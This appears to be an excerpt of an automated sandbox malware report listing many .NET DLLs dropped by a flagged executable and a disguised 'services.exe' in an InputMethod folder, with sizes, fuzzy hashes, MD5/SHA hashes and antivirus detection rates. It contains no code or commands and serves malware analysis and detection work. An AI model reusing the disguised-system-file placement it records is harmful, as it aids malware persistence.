                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38912
                                                              Entropy (8bit):5.679286635687991
                                                              Encrypted:false
                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34816
                                                              Entropy (8bit):5.636032516496583
                                                              Encrypted:false
                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.660491370279985
                                                              Encrypted:false
                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                              MD5:240E98D38E0B679F055470167D247022
                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34304
                                                              Entropy (8bit):5.618776214605176
                                                              Encrypted:false
                                                              SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                              MD5:9B25959D6CD6097C0EF36D2496876249
                                                              SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                              SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                              SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):70144
                                                              Entropy (8bit):5.909536568846014
                                                              Encrypted:false
                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):70144
                                                              Entropy (8bit):5.909536568846014
                                                              Encrypted:false
                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):28160
                                                              Entropy (8bit):5.570953308352568
                                                              Encrypted:false
                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33792
                                                              Entropy (8bit):5.541771649974822
                                                              Encrypted:false
                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):5.932541123129161
                                                              Encrypted:false
                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36352
                                                              Entropy (8bit):5.668291349855899
                                                              Encrypted:false
                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):342528
                                                              Entropy (8bit):6.170134230759619
                                                              Encrypted:false
                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):294912
                                                              Entropy (8bit):6.010605469502259
                                                              Encrypted:false
                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):41472
                                                              Entropy (8bit):5.6808219961645605
                                                              Encrypted:false
                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32256
                                                              Entropy (8bit):5.631194486392901
                                                              Encrypted:false
                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):5.870612048031897
                                                              Encrypted:false
                                                              SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                              MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                              SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                              SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                              SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33792
                                                              Entropy (8bit):5.541771649974822
                                                              Encrypted:false
                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):5.529329139831718
                                                              Encrypted:false
                                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):5.492504448438552
                                                              Encrypted:false
                                                              SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                              MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                              SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                              SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                              SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):40448
                                                              Entropy (8bit):5.7028690200758465
                                                              Encrypted:false
                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.057993947082715
                                                              Encrypted:false
                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):5.645950918301459
                                                              Encrypted:false
                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.41854385721431
                                                              Encrypted:false
                                                              SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                              MD5:BBDE7073BAAC996447F749992D65FFBA
                                                              SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                              SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                              SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):40448
                                                              Entropy (8bit):5.7028690200758465
                                                              Encrypted:false
                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38400
                                                              Entropy (8bit):5.699005826018714
                                                              Encrypted:false
                                                              SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                              MD5:87765D141228784AE91334BAE25AD743
                                                              SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                              SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                              SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34816
                                                              Entropy (8bit):5.636032516496583
                                                              Encrypted:false
                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.629584586954759
                                                              Encrypted:false
                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.660491370279985
                                                              Encrypted:false
                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                              MD5:240E98D38E0B679F055470167D247022
                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):41472
                                                              Entropy (8bit):5.6808219961645605
                                                              Encrypted:false
                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):50176
                                                              Entropy (8bit):5.723168999026349
                                                              Encrypted:false
                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):64000
                                                              Entropy (8bit):5.857602289000348
                                                              Encrypted:false
                                                              SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                              MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                              SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                              SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                              SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):342528
                                                              Entropy (8bit):6.170134230759619
